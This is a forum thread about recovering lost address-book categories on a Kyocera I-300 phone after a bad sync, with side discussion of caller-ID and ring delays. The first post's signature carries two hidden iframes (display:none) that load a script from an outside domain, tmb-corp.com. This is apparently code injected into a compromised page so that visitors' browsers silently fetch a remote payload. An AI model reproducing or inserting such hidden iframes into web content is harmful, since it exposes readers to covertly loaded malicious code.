+ Reply to Thread

Angry Categories wiped out

I have 2,800 entries in my address book in 8 categories. I sync my I-300 with my office, home and laptop computers. For some reason, my laptop computer deleted 4 of the 8 categories moving 1100 addresses to an unfiled status. Before I noticed this I synced my I-300 with the other two computers so the categories are wiped out on all three computers. I do not have a separate back-up of the old address book.

Does anyone know a way to quickly move each entry back to its category. At present, it seems the only way is to open and edit every entry manually, which for 1,100 names would be a long process.

Mark<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Arrow Try This

Mark,
    Try to restore the address.bak file. Hopefully it will have all eight catagories.

Not pickin on you, just curious. I know of no one that knows 2800 people either personally or professionally. What are all these entries for?

Rickeee thanks for the info, I hadn't known about the Revert function, before you pointed it out. My offices and laptop back-ups are the bad revised version, but hopefully my home version is still intact.

Abward, we do web development and PR and I am also a director of Silicon Sound, which is the association of e-businesses in Connecticut and Westchester County, NY. The Silicon Sound membership list consists of 1750 members, which is the majority of the 2800. The remainder are business contacts, reporters, friends & family and boards I'm on. It really isn't that many, if you enter the business cards of people you meet over the course of a week. By the end of the year I have added 300-400 hundred new names. The problem with this number of names is that hot syncs take 5+ minutes, but I do them when I'm on the phone with long winded clients.

Mark

Administrator

Arrow

markatty, curious...

with soo many names in the directory, does your caller id take a long time to show the name of the caller if they are in the address book? on the 6035, when you had that many names in the addy book, it would take a few sec's for the name to show up in the caller id screen (since the phone had toi search the DB in the phone to see if the callers' info is in the phone already).

I just checked and the ID info appears at the same time the phone starts ringing. One thing I did note was that phone I was calling from "rang" twice before, my I-300 started ringing.

Mark

Angry Delay on the ringing

I have also noticed a lag time on the ringing of my phone. When I call my phone from another line, I hear the other line ring two to three times before my I300 starts ringing.

Any ideas why this would be happening?

Administrator

Arrow

its basically because the call has to be routed to the MAIN pcs server.. then route the call to wherever you are.. that would take maybe one-two rings on the callers end. 'kappy thats good that it shows up when it rings... on the 6035 it would ring several times before the name would show up...

:p

Neopoint 1000, massive phone list...

I have carried almost 800 FULL address and phone entries in my Neopoint for almost 2 years, I bought it when it first came out. NEVER any syncing, caller ID or other issues and BTW that is around 200 "criticals" and 600 associated engineers, 3/4 of which I speak with on a monthly basis... thats how you get so many. And, the answer to the next question is Sales.

This list is frequently culled but I can imagine loading much more of my ACT 2000 master list of 5500 this time...

Alex